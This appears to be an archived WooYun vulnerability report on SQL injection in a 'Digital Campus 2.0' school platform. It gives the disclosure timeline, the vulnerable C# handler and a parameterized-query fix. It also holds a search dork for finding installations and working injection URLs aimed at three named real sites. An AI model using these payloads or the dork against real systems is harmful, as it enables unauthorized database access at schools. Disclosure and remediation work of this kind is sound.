WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
2015-03-17: Details sent to the vendor, awaiting vendor handling
2015-03-20: Vendor confirmed; details disclosed to the vendor only
2015-03-23: Details opened to third-party security partners
2015-05-14: Details opened to core white hats and domain experts
2015-05-24: Details opened to regular white hats
2015-06-03: Details opened to intern white hats
2015-06-18: Details disclosed to the public
As titled.
Keyword: intitle:数字校园平台—Digital Campus2.0 Platform
File: code/application/book/syscommontypemanger.aspx
Code:
public void GetDTreeJSON()
{
    SysCommonTypeManager sysCommonTypeManager = new SysCommonTypeManager();
    // SCTID comes from the POST body; text is "" (never null) when it is absent
    string text = (base.Request.Form["SCTID"] == null) ? "" : base.Request.Form["SCTID"].ToString();
    // params is read straight from the request
    string request = base.GetRequest("params");
    if (text != null)
    {
        // request and text go into the query as-is
        DataTable dataTable = sysCommonTypeManager.GetMenuList(null, request, text, "").Tables[0];
        SysModuleJSONHelper sysModuleJSONHelper = new SysModuleJSONHelper();
        sysModuleJSONHelper.Reset();
        sysModuleJSONHelper.set_success(true);
        if (dataTable != null && dataTable.Rows.Count > 0)
        {
            foreach (DataRow dataRow in dataTable.Rows)
            {
                sysModuleJSONHelper.AddItem("id", dataRow["ID"].ToString());
                sysModuleJSONHelper.AddItem("text", dataRow["text"].ToString());
                sysModuleJSONHelper.AddItem("leaf", dataRow["leaf"].ToString());
                sysModuleJSONHelper.AddItem("parentid", dataRow["ParentID"].ToString());
                sysModuleJSONHelper.ItemOk();
            }
        }
        base.Response.Clear();
        base.Response.Write(sysModuleJSONHelper.ToString());
    }
    else
    {
        base.Response.Clear();
        base.Response.Write("success:false");
    }
}
string request = base.GetRequest("params"); // passed into the query without any filtering
Case 1:
http://218.75.5.18/code/application/book/syscommontypemanger.aspx?params=1' and 1=@@version and '1'='1
Case 2:
http://www.tzby.net/code/application/book/syscommontypemanger.aspx?params=1' and 1=@@version and '1'='1
Case 3:
http://www.jszx.cn/code/application/book/syscommontypemanger.aspx?params=1' and 1=@@version and '1'='1
Note here that:
string text = (base.Request.Form["SCTID"] == null) ? "" : base.Request.Form["SCTID"].ToString(); // SCTID must be non-empty.
Filter the parameter!
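The fix the report is asking for, as an added example and not the vendor's code: both request values are bound as typed SqlParameters instead of being concatenated into the query, and SCTID is validated as an integer before it is used. The table name SysCommonType and the filter columns are assumptions; the result columns (ID, text, leaf, ParentID) are the ones the original handler reads back.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not the vendor's code. Table name and filter columns are assumed.
public static class SafeMenuLookup
{
    // Pattern the report describes (for contrast only):
    //   "... WHERE TypeName = '" + request + "' AND ParentID = '" + text + "'"
    // A quote inside `params` ends the string literal and the remainder is run as SQL.

    public static DataTable GetMenuList(string connectionString, string request, string sctid)
    {
        // SCTID is an identifier: accept only an integer, reject anything else up front.
        int sctidValue = 0;
        bool hasSctid = !string.IsNullOrEmpty(sctid);
        if (hasSctid && !int.TryParse(sctid, out sctidValue))
            throw new ArgumentException("SCTID must be an integer");

        const string sql =
            "SELECT ID, text, leaf, ParentID FROM SysCommonType " +
            "WHERE TypeName = @request AND (@hasSctid = 0 OR ParentID = @sctid)";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Values are sent as typed parameters; the server never parses them as SQL text.
            cmd.Parameters.Add("@request", SqlDbType.NVarChar, 200).Value = request ?? string.Empty;
            cmd.Parameters.Add("@hasSctid", SqlDbType.Bit).Value = hasSctid;
            cmd.Parameters.Add("@sctid", SqlDbType.Int).Value = sctidValue;

            var table = new DataTable();
            conn.Open();
            using (var reader = cmd.ExecuteReader())
                table.Load(reader);
            return table;
        }
    }
}
```

With this shape a request such as the `1' and 1=@@version and '1'='1` payload above is simply a string that matches no TypeName, and the endpoint returns an empty result instead of evaluating the injected expression.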
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-03-20 17:34
CNVD confirmed the vulnerability as described; no direct handling channel with the software vendor (or the site's operating unit) has been established yet, pending claim.
None